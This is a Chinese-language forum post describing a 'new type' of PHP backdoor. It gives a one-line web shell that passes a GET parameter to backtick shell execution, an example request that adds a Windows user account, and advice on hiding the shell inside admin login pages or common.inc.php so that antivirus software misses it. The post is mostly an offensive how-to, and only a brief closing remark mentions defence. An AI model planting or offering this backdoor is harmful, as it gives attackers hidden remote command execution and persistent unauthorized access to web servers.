揭秘PHP的一种新型留后门方式
2949 点击·0 回帖
灯火互联
楼主
 |  | |
 | php内大致有这么几种运算符。 按运算符号的功能分为: 一:算术运算符(+ - * / % ++ --) 二:字符串运算符 . 可以叫连接运算符号 三:赋值运算符 = += -= *= /= %= .= 四:比较运算符 > < >= <= == === <> != !== 五:逻辑运算符 ;;或and ||或or !或not 六:位运算符 ; | ^ ~ << >> <<< 七:其他运算符 ? : `` @ => -> :: ; $ 而其中`` 在PHP中,我给它命名是系统运算符 因为包含在``内的字符串可以当做系统命令来执行,那么简单的。。 作者:猴子 为了逃过杀软的查杀。。。。一种新型的PHP后门出来了。 <?php $houzi = $_GET['monkey']; echo `$houzi`; ?> http://www.sbmonkey.com/1.php?monkey=net user monkey monkey /add 很明显的monkey变量的内容为net user monkey monkey /add。需要执行什么命令只需要monkey变量的值。 我们不必如此拘束。我们可以把他放在任意文件内 如:admin_login.asp 把这两句加入在中间增强隐蔽效果。 $houzi = $_GET['monkey']; echo `$houzi`; 执行: http://www.XXXXXXXXX.com /admin/admin_login.php?monkey=net user monkey monkey /add 以前有的人喜欢把后门放在common.inc.php内。这样,所有require 此文件的文件都可以当做后门 既然这样 那么我们完全可以在common.inc.php内使用 $GLOBALS['monkey']="net user monkey monkey /add" 来声明一个超级全局变量,然后在其他我们想插入的文件内插入echo `$houzi`; 这样做方便,免杀效果好 需要谨慎防御 | |
 |  |